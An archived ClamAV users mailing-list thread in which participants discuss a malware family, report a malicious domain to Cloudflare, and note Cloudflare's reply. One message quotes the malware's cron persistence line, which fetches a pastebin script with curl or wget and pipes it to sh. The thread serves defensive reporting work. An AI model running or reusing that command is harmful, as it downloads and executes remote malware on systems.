[clamav-users] LSD Malwares
Xavier Maysonnave
x.maysonnave at gmail.com
Mon Apr 29 05:08:19 UTC 2019
Dear Friends,
I got an answer from Cloudflare. Here is their message :
Hi Xavier Maysonnave,
We have placed a interstitial up and sent a notification to the user.
Regards,
Cloudflare Trust and Safety
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
Le sam. 27 avr. 2019 à 10:30, Xavier Maysonnave <x.maysonnave at gmail.com> a
écrit :
> Hi Joel,
>
> Thanks for your action.
> I also open a request @ Cloudflare.
> *https://support.cloudflare.com/hc/requests/1677155
> <https://support.cloudflare.com/hc/requests/1677155>*
> This ticket is not public though but it could be useful to forward its
> reference to your Cloudflare contact.
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>
>
> Le ven. 26 avr. 2019 à 22:18, Joel Esler (jesler) <jesler at cisco.com> a
> écrit :
>
>> Dear ClamAV-users,
>>
>> I reached out to my contacts at Cloudflare to take action.
>>
>>
>> --
>> Joel Esler
>> Manager, Communities Division
>> Cisco Talos Intelligence Group
>> http://www.talosintelligence.com
>>
>> On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <
>> clamav-users at lists.clamav.net> wrote:
>>
>> Hi All,
>>
>> Thanks for your feedback.
>> I'm going to report to Cloudflare this URL.
>>
>> However keep in mind that there are other URLs who are involved in this
>> family.
>> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
>> https://pastebin.com/raw/wR3ETdbi)|sh
>> This one targets Jenkins, another popular OpenSource tool, not used on
>> our infrastructure though.
>>
>> I'm still very interested with the consequences of this malwares. Any
>> hints will be greatly appreciated.
>>
>> Thanks.
>>
>> Light
>>
>> Pudhuveedu / Xavier
>>
>> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
>> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>>
>>
>> Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <
>> clamav-users at lists.clamav.net> a écrit :
>>
>>> The same applies: Report it. Cloudflare will either forward the
>>> complaint for you, or block the offending URL (or both).
>>>
>>> On 2019-04-25 19:16, Dennis Peterson wrote:
>>> > That domain is hosted on a cloudflare IP block. They're become part of
>>> > the problem.
>>> >
>>> > dp
>>> >
>>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>>> >> hosting provider & domain registrar that they are hosting malware and
>>> >> get that site shut down...
>>> >>
>>>
>>> _______________________________________________
>>>
>>> clamav-users mailing list
>>> clamav-users at lists.clamav.net
>>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>>
>>>
>>> Help us build a comprehensive ClamAV guide:
>>> https://github.com/vrtadmin/clamav-faq
>>>
>>> http://www.clamav.net/contact.html#ml
>>>
>>
>> _______________________________________________
>>
>> clamav-users mailing list
>> clamav-users at lists.clamav.net
>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>
>>
>> Help us build a comprehensive ClamAV guide:
>> https://github.com/vrtadmin/clamav-faq
>>
>> http://www.clamav.net/contact.html#ml
>>
>>
>>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190429/b48a2032/attachment.htm>
More information about the clamav-users
mailing list